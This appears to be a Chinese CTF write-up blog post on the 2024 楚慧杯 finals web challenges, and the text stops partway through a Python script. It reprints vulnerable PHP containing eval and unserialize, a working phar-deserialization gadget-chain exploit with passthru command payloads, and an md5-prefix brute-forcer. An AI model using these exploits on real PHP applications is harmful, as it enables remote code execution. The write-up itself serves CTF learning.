<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="myweb题解这道题目有点可惜，思路是对的，代码那一处少了;导致没执行成功，这里有报错是正常的，代码还是正常执行了的。 先是扫描了一下，发现user.json，给了账号密码，登上去就是一个上传的接口。然后还给了一个读文件的接口&#x2F;show.php?file&#x3D;xxx.jpg，到这里有两个思路:1.图片马 2.phar反序列化。图片马这里是打不通的，因为这里是file_get_content是读文件内容">
<meta property="og:type" content="article">
<meta property="og:title" content="2024楚慧杯决赛复现">
<meta property="og:url" content="http://example.com/2025/01/06/%E6%A5%9A%E6%85%A7%E6%9D%AF%E5%86%B3%E8%B5%9B%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="My0n9s&#39;blog">
<meta property="og:description" content="myweb题解这道题目有点可惜，思路是对的，代码那一处少了;导致没执行成功，这里有报错是正常的，代码还是正常执行了的。 先是扫描了一下，发现user.json，给了账号密码，登上去就是一个上传的接口。然后还给了一个读文件的接口&#x2F;show.php?file&#x3D;xxx.jpg，到这里有两个思路:1.图片马 2.phar反序列化。图片马这里是打不通的，因为这里是file_get_content是读文件内容">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img.picgo.net/2025/01/18/easy_flask1a7f7ce2eaeafc84c.png">
<meta property="og:image" content="https://img.picgo.net/2025/01/18/easy_flask25fe3663165ac32af.png">
<meta property="og:image" content="https://img.picgo.net/2025/01/18/easy_flask3d014902b60d94f42.png">
<meta property="og:image" content="https://img.picgo.net/2025/01/18/easy_flask4a1f9b8219cbf2755.png">
<meta property="og:image" content="https://img.picgo.net/2025/01/18/easy_flask5123c93dfabfe6d94.png">
<meta property="og:image" content="https://img.picgo.net/2025/01/18/easy_flask6eaf1ae6782fbb7d0.png">
<meta property="og:image" content="https://img.picgo.net/2025/01/18/easy_flask767dff30e4baa462c.png">
<meta property="og:image" content="https://img.picgo.net/2025/01/18/easy_flask8451b955959e7c9f2.png">
<meta property="article:published_time" content="2025-01-06T00:41:50.000Z">
<meta property="article:modified_time" content="2025-01-18T08:05:33.266Z">
<meta property="article:author" content="My0n9s">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img.picgo.net/2025/01/18/easy_flask1a7f7ce2eaeafc84c.png">


<link rel="canonical" href="http://example.com/2025/01/06/%E6%A5%9A%E6%85%A7%E6%9D%AF%E5%86%B3%E8%B5%9B%E5%A4%8D%E7%8E%B0/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2025/01/06/%E6%A5%9A%E6%85%A7%E6%9D%AF%E5%86%B3%E8%B5%9B%E5%A4%8D%E7%8E%B0/","path":"2025/01/06/楚慧杯决赛复现/","title":"2024楚慧杯决赛复现"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>2024楚慧杯决赛复现 | My0n9s'blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">My0n9s'blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#myweb"><span class="nav-number">1.</span> <span class="nav-text">myweb</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3"><span class="nav-number">1.1.</span> <span class="nav-text">题解</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D"><span class="nav-number">1.2.</span> <span class="nav-text">反思</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Collect"><span class="nav-number">2.</span> <span class="nav-text">Collect</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3-1"><span class="nav-number">2.1.</span> <span class="nav-text">题解</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#easy-flask"><span class="nav-number">3.</span> <span class="nav-text">easy flask</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3-2"><span class="nav-number">3.1.</span> <span class="nav-text">题解</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%90%8E%E8%AE%B0"><span class="nav-number">3.2.</span> <span class="nav-text">后记</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="My0n9s"
      src="/images/touxiang.jpeg">
  <p class="site-author-name" itemprop="name">My0n9s</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">95</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">28</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/01/06/%E6%A5%9A%E6%85%A7%E6%9D%AF%E5%86%B3%E8%B5%9B%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpeg">
      <meta itemprop="name" content="My0n9s">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="My0n9s'blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="2024楚慧杯决赛复现 | My0n9s'blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2024楚慧杯决赛复现
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2025-01-06 08:41:50" itemprop="dateCreated datePublished" datetime="2025-01-06T08:41:50+08:00">2025-01-06</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2025-01-18 16:05:33" itemprop="dateModified" datetime="2025-01-18T16:05:33+08:00">2025-01-18</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="myweb"><a href="#myweb" class="headerlink" title="myweb"></a>myweb</h1><h2 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h2><p>这道题目有点可惜，思路是对的，代码那一处少了<code>;</code>导致没执行成功，这里有报错是正常的，代码还是正常执行了的。</p>
<p>先是扫描了一下，发现<code>user.json</code>，给了账号密码，登上去就是一个上传的接口。然后还给了一个读文件的接口<code>/show.php?file=xxx.jpg</code>，到这里有两个思路:1.图片马 2.phar反序列化。图片马这里是打不通的，因为这里是<code>file_get_content</code>是读文件内容。而不是直接包含。</p>
<p>通过<code>/show.php?file=show.php</code>可以直接拿到<code>show.php</code>的源码。</p>
<span id="more"></span>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">sing</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$apple</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$range</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;range == <span class="string">&quot;range&quot;</span>)&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;apple is ?&quot;</span>.<span class="variable language_">$this</span>-&gt;apple;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">song</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$banana</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$abble</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;abble == <span class="string">&quot;abble&quot;</span>)&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;banana-&gt;<span class="title function_ invoke__">ernb</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">rap</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$text</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__call</span>(<span class="params"><span class="variable">$name</span>, <span class="variable">$arguments</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;text-&gt;aaabbb;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">basketball</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$payload</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$name</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag|system|php|cat|eval|tac|sort|shell|%|~|\\^|\\.|\&#x27;/i&quot;</span>, <span class="variable">$this</span>-&gt;payload))&#123;</span><br><span class="line">            @<span class="keyword">eval</span>(<span class="variable language_">$this</span>-&gt;payload);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$imagePath</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/(\/flag|\/fl|\/f|sort)/i&quot;</span>, <span class="variable">$imagePath</span>))&#123;</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$imageData</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$imagePath</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$imageData</span> !== <span class="literal">false</span>) &#123;</span><br><span class="line"></span><br><span class="line">        <span class="variable">$finfo</span> = <span class="title function_ invoke__">finfo_open</span>(FILEINFO_MIME_TYPE);</span><br><span class="line">        <span class="variable">$mimeType</span> = <span class="title function_ invoke__">finfo_buffer</span>(<span class="variable">$finfo</span>, <span class="variable">$imageData</span>);</span><br><span class="line">        <span class="title function_ invoke__">finfo_close</span>(<span class="variable">$finfo</span>);</span><br><span class="line"></span><br><span class="line">        <span class="title function_ invoke__">header</span>(<span class="string">&quot;Content-Type: <span class="subst">$mimeType</span>&quot;</span>);</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$imageData</span>;</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Image cannot be read.&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>像这种直接给了源码的，有链子的，phar反序列化无疑了。。。</p>
<p>构造链子poc:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">sing</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$apple</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$range</span>=<span class="string">&quot;range&quot;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;apple=<span class="keyword">new</span> <span class="title function_ invoke__">song</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">song</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$banana</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$abble</span>=<span class="string">&quot;abble&quot;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;banana=<span class="keyword">new</span> <span class="title function_ invoke__">rap</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">rap</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$text</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;text=<span class="keyword">new</span> <span class="title function_ invoke__">basketball</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">basketball</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$payload</span>=<span class="string">&#x27;passthru(&quot;dir&quot;);&#x27;</span>;  <span class="comment">//我这里测试的环境是window，linux下改下命令即可。</span></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$name</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag|system|php|cat|eval|tac|sort|shell|%|~|\\^|\\.|\&#x27;/i&quot;</span>, <span class="variable">$this</span>-&gt;payload))&#123;</span><br><span class="line">            @<span class="keyword">eval</span>(<span class="variable language_">$this</span>-&gt;payload);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$phar</span>=<span class="keyword">new</span> <span class="title class_">Phar</span>(<span class="string">&quot;hack100.phar&quot;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">startBuffering</span>();</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setStub</span>(<span class="string">&quot;GIF89a&lt;?php __HALT_COMPILER();?&gt;&quot;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setMetadata</span>(<span class="keyword">new</span> <span class="title function_ invoke__">sing</span>());</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">addFromString</span>(<span class="string">&quot;text.txt&quot;</span>,<span class="string">&quot;hello,phar!&quot;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">stopBuffering</span>();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>生成的<code>phar</code>文件改一下后缀成<code>jpg</code>，然后上传，最后通过<code>/show.php?file=phar://./uploads/hack100.jpg</code>触发。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">最终拿flag：//linux下</span><br><span class="line">$payload=&#x27;passthru(&quot;nl /fl*&quot;);&#x27;;或者</span><br><span class="line">$payload=&#x27;echo `nl /fl*`;&#x27;;</span><br></pre></td></tr></table></figure>



<h2 id="反思"><a href="#反思" class="headerlink" title="反思"></a>反思</h2><p><code>payload</code>那里没有加分号，导致代码没有执行，加上有报错信息以为生成的<code>phar</code>文件有问题。</p>
<h1 id="Collect"><a href="#Collect" class="headerlink" title="Collect"></a>Collect</h1><h2 id="题解-1"><a href="#题解-1" class="headerlink" title="题解"></a>题解</h2><p>这个题目也是给了源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">safe</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$password</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;password;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">unsafe</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$username</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="variable">$action</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;action&#x27;</span>] ?: <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">        <span class="variable">$arg</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;arg&#x27;</span>] ?: <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;username = <span class="variable language_">$this</span>-&gt;username . <span class="string">&quot;hack me!&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;username;</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^[a-z0-9_]*$|\n/isD&#x27;</span>, <span class="variable">$action</span>)) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;Do it another way&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$this</span>-&gt;username), <span class="number">0</span>, <span class="number">5</span>) == <span class="string">&#x27;ae471&#x27;</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;can call dangerous syscall&quot;</span>;</span><br><span class="line">                <span class="variable">$action</span>(<span class="string">&#x27;&#x27;</span>, <span class="variable">$arg</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;__toString was called!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&quot;unsafe&quot;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">    <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_POST</span>[<span class="string">&quot;unsafe&quot;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>链子很简单，主要就是绕过两个地方：<code>substr(md5($this-&gt;username), 0, 5) == &#39;ae471&#39;</code>和<code>preg_match(&#39;/^[a-z0-9_]*$|\n/isD&#39;, $action)</code>。</p>
<p>这里第一处直接可以写脚本来爆破，不过需要注意的是这里的<code>username</code>是拼接了<code>hack me!</code>的。python脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">find_string_with_md5_prefix</span>(<span class="params">prefix</span>):</span><br><span class="line">    i = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="comment"># 构造当前字符串（可以是数字，字母，或者其他字符）</span></span><br><span class="line">        current_string = <span class="built_in">str</span>(i)</span><br><span class="line">        current_string=current_string+<span class="string">&#x27;hack me!&#x27;</span></span><br><span class="line"></span><br><span class="line">        <span class="comment"># 计算字符串的 MD5 哈希值</span></span><br><span class="line">        md5_hash = hashlib.md5(current_string.encode(<span class="string">&#x27;utf-8&#x27;</span>)).hexdigest()</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 检查哈希值的前五位</span></span><br><span class="line">        <span class="keyword">if</span> md5_hash[:<span class="number">5</span>] == prefix:</span><br><span class="line">            <span class="keyword">return</span> current_string, md5_hash</span><br><span class="line"></span><br><span class="line">        i += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 使用函数找到 MD5 前五位为 &#x27;ae471&#x27; 的字符串</span></span><br><span class="line">prefix = <span class="string">&#x27;ae471&#x27;</span></span><br><span class="line">result_string, md5_value = 